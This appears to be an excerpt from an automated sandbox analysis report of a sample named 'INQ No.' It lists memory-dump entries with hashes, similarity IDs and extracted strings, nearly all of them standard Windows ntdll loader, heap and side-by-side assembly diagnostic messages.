                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                            • API String ID: 0-2368682639
                                                                                                                                                                            • Opcode ID: ad640a07dbfa12f1620071c6b81fd389b4ee7452d152fbb8262cd5c0e39d87ad
                                                                                                                                                                            • Instruction ID: b8e993c0032b2e73845f30251116b1f9a855353fb412fa164c66852ce9ff010f
                                                                                                                                                                            • Opcode Fuzzy Hash: ad640a07dbfa12f1620071c6b81fd389b4ee7452d152fbb8262cd5c0e39d87ad
                                                                                                                                                                            • Instruction Fuzzy Hash: F4818AB1A00758AFDB20DF94C941FAEBBF9AB08B14F244119F905B7281D7B5AD41EB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00F42498
                                                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00F42506
                                                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00F425EB
                                                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00F42409
                                                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00F42602
                                                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00F42624
                                                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00F42412
                                                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00F424C0
                                                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 00F4261F
                                                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00F422E4
                                                                                                                                                                            • @, xrefs: 00F4259B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                            • API String ID: 0-4009184096
                                                                                                                                                                            • Opcode ID: f85cb58b11c9b00faedba6ed3fb114b0c43174689d84c26c8f1cb1d3385b8426
                                                                                                                                                                            • Instruction ID: 17acde606a980c57213526f500178cb285791aa540b1c3705cbeb2b6e827955f
                                                                                                                                                                            • Opcode Fuzzy Hash: f85cb58b11c9b00faedba6ed3fb114b0c43174689d84c26c8f1cb1d3385b8426
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A0262F2D002289BDB61DB14CD85BEDB7B8AB44314F4041E9BA49B7281D7349F84EF69
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                            • API String ID: 0-2515994595
                                                                                                                                                                            • Opcode ID: cb4d2abe8f1a2559969f813addd64f4edef7b5b4af908f7c593314661f5f725b
                                                                                                                                                                            • Instruction ID: 036ce74d5fe906f7d85bc0a812767a4e4272d6abcaa59af072d9fedd2ed59380
                                                                                                                                                                            • Opcode Fuzzy Hash: cb4d2abe8f1a2559969f813addd64f4edef7b5b4af908f7c593314661f5f725b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F51D3719483119BC325DF149C49BABBBE8EFC8390F14851EB89887280EB74D506E7A2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                            • API String ID: 0-1700792311
                                                                                                                                                                            • Opcode ID: 9c6bac47e5383ed3c47edf0cc15115528e21c184d1314208bf8a44c4c902fac2
                                                                                                                                                                            • Instruction ID: 28aabbd2bfa4de29290a33c7916349249ecaca1b6cc79684570bfedb99a90584
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c6bac47e5383ed3c47edf0cc15115528e21c184d1314208bf8a44c4c902fac2
                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD11331900685DFCB51EF68C852BEDBBF1FF4A720F488059E445AB262DB35E945EB20
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V${
                                                                                                                                                                            • API String ID: 0-2184846227
                                                                                                                                                                            • Opcode ID: a7d97dced9fd57144cd630d202e2ed2ea50073b6f17036380cc6a6a9fd110580
                                                                                                                                                                            • Instruction ID: 5fe0e9929b1b1fd1beca7651d09a239b49d8e9616db379f38d62c5ef909adc84
                                                                                                                                                                            • Opcode Fuzzy Hash: a7d97dced9fd57144cd630d202e2ed2ea50073b6f17036380cc6a6a9fd110580
                                                                                                                                                                            • Instruction Fuzzy Hash: 26A23774E056298FDB64DF18CC887A9B7B5EF45314F2442EAD809A7391DB34AE82DF00
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • VerifierDlls, xrefs: 00F58CBD
                                                                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00F58A67
                                                                                                                                                                            • HandleTraces, xrefs: 00F58C8F
                                                                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 00F58B8F
                                                                                                                                                                            • VerifierFlags, xrefs: 00F58C50
                                                                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00F58A3D
                                                                                                                                                                            • VerifierDebug, xrefs: 00F58CA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                            • API String ID: 0-3223716464
                                                                                                                                                                            • Opcode ID: bc94a09adfde278cf43ce272cc138528ee441ca1d9000aa7317675cd0d9aa096
                                                                                                                                                                            • Instruction ID: 0039ce471914b555faaa8e52edb455c938bf21691d93ba0a7cc13c45136623ad
                                                                                                                                                                            • Opcode Fuzzy Hash: bc94a09adfde278cf43ce272cc138528ee441ca1d9000aa7317675cd0d9aa096
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A912672A05715EFD311DF288D82F5A77E8AB84B61F040458FE417B292DB74AC0AF791
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-792281065
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F29A2A
                                                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F29A01
                                                                                                                                                                            • LdrpInitShimEngine, xrefs: 00F299F4, 00F29A07, 00F29A30
                                                                                                                                                                            • apphelp.dll, xrefs: 00EC6496
                                                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F299ED
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F29A11, 00F29A3A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-204845295
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializeProcess, xrefs: 00F0C6C4
                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 00F48181, 00F481F5
                                                                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 00F481E5
                                                                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 00F48170
                                                                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 00F48177, 00F481EB
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F0C6C3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                            • API String ID: 0-475462383
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00F42180
                                                                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00F4219F
                                                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 00F42165
                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00F421BF
                                                                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 00F42160, 00F4219A, 00F421BA
                                                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00F42178
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                            • API String ID: 0-861424205
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00F12DF0: LdrInitializeThunk.NTDLL ref: 00F12DFA
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10BA3
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10BB6
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10D60
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F10D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializeProcess, xrefs: 00F08422
                                                                                                                                                                            • @, xrefs: 00F08591
                                                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F0855E
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F08421
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • .Local, xrefs: 00F028D8
                                                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00F422B6
                                                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00F421D9, 00F422B1
                                                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 00F421DE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                            • API String ID: 0-1239276146
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00F43456
                                                                                                                                                                            • RtlDeactivateActivationContext, xrefs: 00F43425, 00F43432, 00F43451
                                                                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00F4342A
                                                                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00F43437
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                            • API String ID: 0-1245972979
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00F30FE5
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00F310AE
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00F31028
                                                                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00F3106B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                            • API String ID: 0-1468400865
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpDynamicShimModule, xrefs: 00F3A998
                                                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00F3A992
                                                                                                                                                                            • TG, xrefs: 00EF2462
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F3A9A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2078120800
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • HEAP: , xrefs: 00EE3264
                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 00EE3255
                                                                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00EE327D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                            • API String ID: 0-617086771
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $@
                                                                                                                                                                            • API String ID: 0-1077428164
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                            • API String ID: 0-2779062949
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 00F3A10F
                                                                                                                                                                            • LdrpCheckModule, xrefs: 00F3A117
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F3A121
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-161242083
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-1334570610
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 00F482DE
                                                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 00F482D7
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00F482E8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-1783798831
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • @, xrefs: 00F8C1F1
                                                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00F8C1C5
                                                                                                                                                                            • PreferredUILanguages, xrefs: 00F8C212
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                            • API String ID: 0-2968386058
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                            • API String ID: 0-1373925480
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

